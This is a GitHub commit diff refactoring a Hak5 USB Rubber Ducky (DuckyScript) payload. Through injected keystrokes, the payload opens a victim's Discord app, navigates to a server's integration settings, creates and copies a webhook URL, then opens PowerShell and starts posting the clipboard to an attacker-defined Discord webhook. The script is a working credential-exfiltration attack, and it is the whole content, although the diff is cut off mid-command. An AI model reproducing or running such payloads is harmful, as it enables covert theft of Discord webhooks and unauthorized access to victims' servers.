Update payload.txt

pull/174/head
Kalani Helekunihi 2023-06-12 14:01:20 -04:00 committed by GitHub
parent 38036c8272
commit 017e51d363
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 84 deletions

View File

@ -13,131 +13,61 @@ REM Requirements:
REM - Internet connection REM - Internet connection
REM - Discord Installed REM - Discord Installed
REM You must define the Discord server name i.e. Hak5 REM You must define the Discord server name i.e. Hak5
DEFINE SERVER_NAME example DEFINE #SERVER_NAME example
REM You must define your Discord webhook if you want to use this method for the exfiltration REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE DISCORD_WEBHOOK example DEFINE #DISCORD_WEBHOOK example
DEFAULT_DELAY 500
REM Open Discord app REM Open Discord app
GUI GUI
DELAY 1000 STRINGLN Discord
STRING Discord
ENTER
REM It depends REM It depends
DELAY 6000 DELAY 6000
REM Search by Discord keyboard shortcut and open it REM Search by Discord keyboard shortcut and open it
CTRL k CTRL k
DELAY 500
STRING * STRING *
STRING SERVER_NAME STRINGLN #SERVER_NAME
ENTER
DELAY 500
REM Go to first channel and open the settings REM Go to first channel and open the settings
TAB REPEAT 11 TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
DELAY 500
REM Open Integrations section REM Open Integrations section
TAB REPEAT 6 TAB
DELAY 500 REPEAT 3 DOWNARROW
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
DOWN_ARROW
DELAY 500
DOWN_ARROW
DELAY 500
DOWN_ARROW
DELAY 500
ENTER ENTER
DELAY 500
REM Webhooks settings REM Webhooks settings
TAB REPEAT 2 TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
REM Create Webhook REM Create Webhook
TAB REPEAT 3 TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER ENTER
DELAY 500
REM Select first Webhook REM Select first Webhook
TAB TAB
DELAY 500
ENTER ENTER
DELAY 500
REM Copy Webhook REM Copy Webhook
TAB REPEAT 5 TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
SPACE SPACE
DELAY 500
REM Close Discord REM Close Discord
ALT F4 ALT F4
REM Open a PowerShell REM Open a PowerShell
DELAY 500
GUI r GUI r
DELAY 500 STRINGLN powershell
STRING powershell
DELAY 500
ENTER
DELAY 2000 DELAY 2000
REM Exfiltration using Discord Webhook REM Exfiltration using Discord Webhook
STRING $WebhookUrl = " STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRING DISCORD_WEBHOOK
STRINGLN "
STRING $Payload = @{content = " STRING $Payload = @{content = "
CTRL v CTRL v